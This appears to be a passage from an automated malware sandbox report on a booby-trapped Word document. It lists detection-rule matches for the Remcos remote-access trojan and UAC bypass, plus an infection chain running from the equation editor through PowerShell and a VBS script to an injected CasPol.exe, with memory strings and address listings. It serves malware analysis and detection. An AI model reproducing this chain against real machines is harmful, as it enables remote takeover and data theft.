                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_004533AB20_2_004533AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0042742E20_2_0042742E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0043756620_2_00437566
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0043E5A820_2_0043E5A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_004387F020_2_004387F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0043797E20_2_0043797E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_004339D720_2_004339D7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0044DA4920_2_0044DA49
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00427AD720_2_00427AD7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0041DBF320_2_0041DBF3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00427C4020_2_00427C40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00437DB320_2_00437DB3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00435EEB20_2_00435EEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0043DEED20_2_0043DEED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00426E9F20_2_00426E9F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_1001719420_2_10017194
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_1000B5C120_2_1000B5C1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_0044B04022_2_0044B040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_0043610D22_2_0043610D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_0044731022_2_00447310
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_0044A49022_2_0044A490
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_0040755A22_2_0040755A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_0043C56022_2_0043C560
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_0044B61022_2_0044B610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_0044D6C022_2_0044D6C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_004476F022_2_004476F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_0044B87022_2_0044B870
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_0044081D22_2_0044081D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_0041495722_2_00414957
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_004079EE22_2_004079EE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_00407AEB22_2_00407AEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_0044AA8022_2_0044AA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_00412AA922_2_00412AA9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_00404B7422_2_00404B74
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_00404B0322_2_00404B03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_0044BBD822_2_0044BBD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_00404BE522_2_00404BE5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_00404C7622_2_00404C76
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_00415CFE22_2_00415CFE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_00416D7222_2_00416D72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_00446D3022_2_00446D30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_00446D8B22_2_00446D8B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_00406E8F22_2_00406E8F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 23_2_0040503823_2_00405038
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 23_2_0041208C23_2_0041208C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 23_2_004050A923_2_004050A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 23_2_0040511A23_2_0040511A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 23_2_0043C13A23_2_0043C13A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 23_2_004051AB23_2_004051AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 23_2_0044930023_2_00449300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 23_2_0040D32223_2_0040D322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 23_2_0044A4F023_2_0044A4F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 23_2_0043A5AB23_2_0043A5AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 23_2_0041363123_2_00413631
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 23_2_0044669023_2_00446690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 23_2_0044A73023_2_0044A730
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 23_2_004398D823_2_004398D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 23_2_004498E023_2_004498E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 23_2_0044A88623_2_0044A886
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 23_2_0043DA0923_2_0043DA09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 23_2_00438D5E23_2_00438D5E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 23_2_00449ED023_2_00449ED0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 23_2_0041FE8323_2_0041FE83
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 23_2_00430F5423_2_00430F54
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_004050C224_2_004050C2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_004014AB24_2_004014AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_0040513324_2_00405133
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_004051A424_2_004051A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_0040124624_2_00401246
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_0040CA4624_2_0040CA46
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_0040523524_2_00405235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_004032C824_2_004032C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_0040168924_2_00401689
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_00402F6024_2_00402F60
                  Source: ~WRF{DE8BB6AA-6431-42DF-A763-75296C786D33}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004169A7 appears 87 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004165FF appears 35 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00434801 appears 41 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00422297 appears 42 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00434E70 appears 54 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00402093 appears 50 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 0044DB70 appears 41 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00401E65 appears 35 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00444B5A appears 37 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00413025 appears 79 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00416760 appears 69 times
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2186
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2186Jump to behavior
                  Source: 20.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 20.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 20.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 20.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 20.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 20.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000013.00000002.515289278.00000000038C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 1980, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 2924, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 2924, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: CasPol.exe PID: 3608, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\54D5D963.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\deethebestthingwithmegreatattirudewithgreatthigns_________eniterlifewithgreatniceworkingskillwithmebgreatthignstobe________verynicepersonentiterlifewithnewthi[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                  Source: bhv2D0A.tmp.22.drBinary or memory string: org.slneighbors
                  Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winDOC@28/44@11/6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,22_2_004182CE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,20_2_0041798D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,24_2_00410DE1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,22_2_00418758
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,20_2_0040F4AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,20_2_0041B539
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,20_2_0041AADB
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$ NAHK22012FA00000.docx.docJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-N6HMP4
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR88AF.tmpJump to behavior
                  Source: PO NAHK22012FA00000.docx.docOLE indicator, Word Document stream: true
                  Source: PO NAHK22012FA00000.docx.docOLE indicator, Word Document stream: true
                  Source: PO NAHK22012FA00000.docx.docOLE indicator, Word Document stream: true
                  Source: ~WRD0000.tmp.0.drOLE indicator, Word Document stream: true
                  Source: ~WRD0000.tmp.0.drOLE indicator, Word Document stream: true
                  Source: ~WRD0000.tmp.0.drOLE indicator, Word Document stream: true
                  Source: PO NAHK22012FA00000.docx.docOLE document summary: title field not present or empty
                  Source: PO NAHK22012FA00000.docx.docOLE document summary: title field not present or empty
                  Source: PO NAHK22012FA00000.docx.docOLE document summary: title field not present or empty
                  Source: ~WRF{DE8BB6AA-6431-42DF-A763-75296C786D33}.tmp.0.drOLE document summary: title field not present or empty
                  Source: ~WRF{DE8BB6AA-6431-42DF-A763-75296C786D33}.tmp.0.drOLE document summary: author field not present or empty
                  Source: ~WRF{DE8BB6AA-6431-42DF-A763-75296C786D33}.tmp.0.drOLE document summary: edited time not present or 0
                  Source: ~WRD0000.tmp.0.drOLE document summary: title field not present or empty
                  Source: ~WRD0000.tmp.0.drOLE document summary: title field not present or empty
                  Source: ~WRD0000.tmp.0.drOLE document summary: title field not present or empty
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\getbestthingswithbestpicturewithgreatthingson.vbS"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................0.......(.P.............................I[.........................s.............. ................s............Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................M[.........................s.............. .............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................@........H.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................@........H.........................s..............&.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................@........H.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................@........H.........................s..............&.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................@........H.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................@........H.........................s..............&.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.......&.....N.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................@........H...................... .a.g.a...........&.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.@........I...................... .a.g.a...........&..... .......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................@........I...................... .a.g.a...........&.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .d.E.v.i.c.E.C.R.E.d.e.N.T.i.A.L.D.E.p.l.O.Y.M.e.N.t...e.X.e. .a.g.a...........&.....@.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................@.......-I...................... .a.g.a...........&.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~. .a.g.a...........&.....@.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................@.......KI...................... .a.g.a...........&.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................@.......]I...................... .a.g.a.........................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................@.......iI...................... .a.g.a...........&.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....&.....N.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................@........I......................c.e.p.t...........&.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................d........I......................c.e.p.t.................l.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................d........I......................c.e.p.t...........&.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................d........I......................c.e.p.t...........&.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................d........I......................c.e.p.t...........&.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................T.r.u.e.(.P..... ...............p........y.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ....................................u.e.(.P..... ...............p........y.........................s............................................
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSystem information queried: HandleInformation
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: CasPol.exe, CasPol.exe, 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                  Source: CasPol.exe, CasPol.exe, 00000017.00000002.539517729.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: CasPol.exe, 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                  Source: CasPol.exe, CasPol.exe, 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                  Source: CasPol.exe, CasPol.exe, 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
